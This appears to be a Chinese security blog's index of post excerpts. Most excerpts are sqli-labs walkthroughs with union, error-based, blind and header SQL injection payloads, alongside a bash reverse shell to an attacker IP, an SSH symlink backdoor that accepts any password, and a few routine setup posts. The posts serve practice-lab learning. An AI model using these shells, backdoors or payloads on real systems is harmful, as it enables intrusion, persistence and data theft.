反弹shell 一、通过bash反弹shell1、 在攻击机上通过nc命令监听2222端口┌──(kali㉿kali)-[~/Desktop]└─$ nc -lvvp 2222listening on [any] 2222 ...2、在服务器上连接攻击机(192.168.137.131)上面监听的2222端口[root@localhost netcat-0.7.1]# bash -i >& /dev/tcp/192.168.137.131/2222 0>&13、连..
ssh免密登录配置 1、在客户端机器上生成密钥,这里连续三个回车默认即可。[root@localhost ~]# ssh-keygen -t rsaGenerating public/private rsa key pair.Enter file in which to save the key (/root/.ssh/id_rsa): Enter passphrase (empty for no passphrase): Enter same passphrase again: Your identific.
通过SSH留后门(创建ssh软链接) 一、判断sshd_config配置中的UsePAM参数是否为yescat /etc/ssh/sshd_config二、确认对应的pam配置文件是否包含auth sufficient pam_rootok.so配置,只在包含这件配置才可以通过ssh任意密码登录。三、通过命令创建后门软链接,通过查看端口己监听。ln -sf /usr/sbin/sshd /tmp/su; /tmp/su -oPort=12345netstat -antlp四、通过另一台机器ssh进行任意密码登
Springboot+camunda+mysql(一) 41、springboot(2.5.10)用的是快速开发框架若依(www.ruoyi.vip)方便快速集成测试。2、camunda用的7.15.0,这里的版本不能随意用,根据官网对应的配置要求,不同的springboot版本对应不同的camunda版本。官网地址:Spring Boot Version Compatibility | docs.camunda.org3、在项目pom.xml中添加camunda的依赖,我这里用的是7.16.0的版本<properties>.
Linux安装clamav(本文转载:https://blog.csdn.net/qq_39564555/article/details/123300014) 1、官网下载地址:https://www.clamav.net/downloadswgethttps://www.clamav.net/downloads/production/clamav-0.104.2.linux.x86_64.rpm2、安装rpm -ivh --prefix=/usr/local/clamav clamav-0.104.2.linux.x86_64.rpm3、添加用户组及创建用户groupadd clamavuseradd -g clamav cl.
sqli-labs靶场Less-23 注释绕过 这里过滤掉了 # 和 -- ,所以这里第一条件就是要让union前面的条件失效,第二就是通过结尾的and '1'='1 进行绕过?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() and '1'='1...
sqli-labs靶场Less-20~22 Cookie注入 cookie注入的内容一定要进行url编码admin%27%20and%201%3D2%20union%20select%201%2Cdatabase()%2Cversion()--%20qwe解码后admin' and 1=2 union select 1,database(),version()-- qwe
sqli-labs靶场Less-19 POST /sqlilabs/Less-19/ HTTP/1.1Host: 192.168.60.142:8080User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN.
sqli-labs靶场Less-18 POST /sqlilabs/Less-18/ HTTP/1.1Host: 192.168.60.142:8080User-Agent: ',updatexml(1,concat(0x7e,(select database())),1),1)-- qweAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0..
sqli-labs靶场Less-17 1、访问首页,/Less-17/index.php,这里的传参点是表单中的uname、passwd判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 结合1~5判断是否存在延时注入 结合1~5判断是否存在报错注入(假设查询语句没错,代码中的其它语句可以报错) 结合1~5判断是否存在head注入 ' and updatexml(1,concat(0x7e,(select database(...
sqli-labs靶场Less-16 1、访问首页,/Less-16/index.php,这里的传参点是表单中的uname、passwd判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入2、判断字段数admin") order by 2-- qwe3、判断数据库长度-- 盲注admin") and length(database())=8-- ...
sqli-labs靶场Less-15 1、访问首页,/Less-15/index.php,这里的传参点是表单中的uname、passwd判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 如果以上都不适:哪以上规则都同时加上sleep测试一遍,看是不是存在延时注入分析:这里同时存在布尔型(延时)注入,哪这里可以使用盲注 或 延时盲注来做这个题。2、使用盲注获取数据库长度-- 盲注admin' and length(databa...
sqli-labs靶场Less-14 1、访问首页,/Less-14/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注2、使用报错注入获取库名" and updatexml(1,concat(0x7e,(select database())),1) -- qwe3、获取表名 " and updatexml(1,concat(0x7e,...
sqli-labs靶场Less-13 1、访问首页,/Less-13/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注分析:这里是单引号+括号闭合,但这里正确时并没有显示点,但在探测过程中会报SQL语名错误的内容,所以这里判断可以用报错注入。2、尝试使用报错注入admin') and updatexml(1,concat(0x7e,(select .
sqli-labs靶场Less-12 1、访问首页,/Less-12/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。admin") order by 3-- qwe3、查看SQL结果显示点") union select 1,2-- ..
sqli-labs靶场Less-11 1、访问首页,/Less-10/index.php,这里的传参点是表单中的uname、passwd探测六步判断是否是数字形传参 判断是否有单引号闭合 admin' -- qwe 判断是否是双引号闭合 判断是否单引号+括号闭合 判断是否是双引号+括号闭合 判断是否是延时盲注分析:这里是通过单引号闭合,注释掉后面的SQL直接绕过登录2、通过在uname后面拼接参数 order by 1~3 ,如下图3的时候提示没有3个字段,只有2个。3、通过uni...